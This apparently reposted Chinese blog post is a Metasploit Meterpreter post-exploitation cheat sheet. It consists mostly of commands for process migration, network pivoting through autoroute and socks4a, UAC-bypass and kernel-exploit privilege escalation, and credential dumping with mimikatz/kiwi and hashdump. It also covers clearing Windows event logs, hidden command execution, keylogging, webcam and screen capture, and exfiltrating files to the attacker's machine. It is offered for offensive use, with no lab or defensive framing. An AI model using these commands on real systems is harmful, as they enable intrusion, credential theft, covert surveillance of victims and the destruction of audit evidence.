meterpreter后渗透攻击
Posted lisenMiller
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了meterpreter后渗透攻击相关的知识,希望对你有一定的参考价值。
Meterpreter后渗透
msf提供了非常强大的后渗透工具-meterpreter.获取目标机的meterpreter后有以下优势
- 纯内存工作模式
- 加密通信协议,而且同时与几个通道通信
- 攻击进程内工作,多进程内迁移
- 平台互通
进程迁移
通过浏览器的shell可能是一个脆弱的shell,将shell和一个稳定的进程绑定到一起,就不需要对磁盘进行任何写入操作.
1.meterpreter手工迁移
getpid命令查看自己的pid是多少 #迁移进程 找到一些比较经常出现在进程而且较稳定的服务进行迁移 migrate pid #原本的进程会自动关闭,为了确保不存在最好再使用kill -9 pid强制删除
2.msf利用模块迁移
run post/windows/manage/migrate
系统命令
1.收集系统信息
sysinfo
2.查看网络设置
route
3.查看当前权限
getuid
4.查看网络结构
先进行跳转,输入background将meterpreter中断隐藏在后台
route add命令添加路由,
meterpreter > background
backgrounding session 1 . . .
msf > route add 192.168.1.0 255.255.255.0 1(session 1的意思)
msf > route print
active routing table
subnet netmask gateway
192.168.1.0 255.255.255.0 session 1
网络类命令
ipconfig/ifconfig arp -a netstat -ano getproxy #查看代理信息 route #路由
端口转发
portfwd add -l 6666 -p 3389 - r 127.0.0.1 #将目标机的3389端口转发到本地6666端口
autoroute添加路由
run get_local_subnets run autoroute -s 192.168.1.0/24 #添加到目标环境网络 run autoroute -p #查看添加的路由
socks4a代理
autoroute添加完路由后,利用msf自带的socks4a代理
msf > use auxiliary/server/socks4a msf > set srvhost 127.0.0.1 msf > set srvport 1080 msf > run vi /etc/proxychains.conf socks4 127.0.0.1 1080
利用proxichains 访问
提权
getsystem提权
bypassuac提权
search bypassuac
有以下几个
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask
例如:
msf > use exploit/windows/local/bypassuac
msf > set SESSION 2
msf > run
再次执行getsystem获取系统权限
内核漏洞提权
先用enum_patches收集补丁信息,查找可用的exploit进行提权
search enum_patches
meterpreter > run post/windows/gather/enum_patches #查看补丁信息 msf > use exploit/windows/localms13_053_schlamperei msf > set session 2 msf > exploit
文件系统命令
1.查看当前处于目标机的哪个目录
pwd / getwd
getlwd:查看当前处于本地的某个目录
ls:列出当前目录所有文件
2.搜索指定类型的文件
search -f *.txt -d c:\\
-f 用于指定搜索文件 -d 指定哪个目录下进行搜索
3.下载文件
download 目标机文件 攻击机目录
download c:\\test.txt /root
4.上传文件
upload 攻击机文件 目标机路径
5在目标机切换目录
lcd /tmp #操作攻击者主机 切换目录
抓密码
mimikatz抓
load kiwi
creds_all
1.hashdump 2.run windows/gather/smart_hashdump 3.run windows/gather/credentials/windows_autologin
清除日志
clearev #清除windows中的应用程序日志、系统日志、安全日志
执行文件
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
获得shell以后的获取敏感文件操作
判断是否为多网卡机器扫描其他网段
尽量收集机器上的敏感信息,敏感内部文件,账号密码本等
1.抓取自动登录的密码
run windows/gather/credentials/windows_autologin #抓取用户存储的自动登录账户密码
2导出密码hash
hashdump
3.查看权限后,抓取密码
getuid
#load mimikatz开启功能 / load kiwi
creds_all #抓取密码 retrieving all credentials
Metasploit渗透——meterpreter基础命令
Meterpreter
系统信息
sysinfo
用户标识
getuid
获取权限
getsystem
当前目录
pwd
列举进程
ps
键盘记录
##扫描远程计算机键盘活动
keyscan_start
##显示远程计算机键盘活动
keyscan_dump
##停止扫描远程计算机键盘活动
keyscan_stop
显示驱动器
show_mount
截屏
保存远程PC的屏幕截图
screenshot
从kali上传文件
upload /root/abc.exe C:\\\\system32\\\\
下载
download C:\\\\pass.txt /root/
获取远程计算机的cmd
shell
服务器sid
getsid
远程计算机IP地址及Mac地址
ipconfig
将当前活动的Meterpreter会话发送到后台
background
将当前进程从一个端口迁移到另一个
migrate <端口>
重启远程计算机
reboot
摄像头
##查看是否具有摄像头
webcarm_list
##摄像头拍摄照片
webcam_snap
##摄像头开启视频
webcam_stream
当前进程的pid
getpid
当地时间
localtime
生成文件hash值
checksum md5 abc.txt
读取文件
cat my.ini
复制文件
cp abc.txt pass.txt
cp <旧文件> <新文件>
目录
dir
编辑文件
edit abc.txt
##和vim命令的使用方法相同
移动文件
mv <旧文件目录> <新文件目录>
##和linux中的mv命令相同
删除文件
rm <file1> <file2> ...
##和linux中的rm命令相同
创建目录
mkdir <目录名1> <目录名2> ...
搜索
search -f *.jpeg
开启靶机3389端口
run getgui -e
枚举账户hash散列值
run hashdump
列举后渗透模块
load -l
以上是关于meterpreter后渗透攻击的主要内容,如果未能解决你的问题,请参考以下文章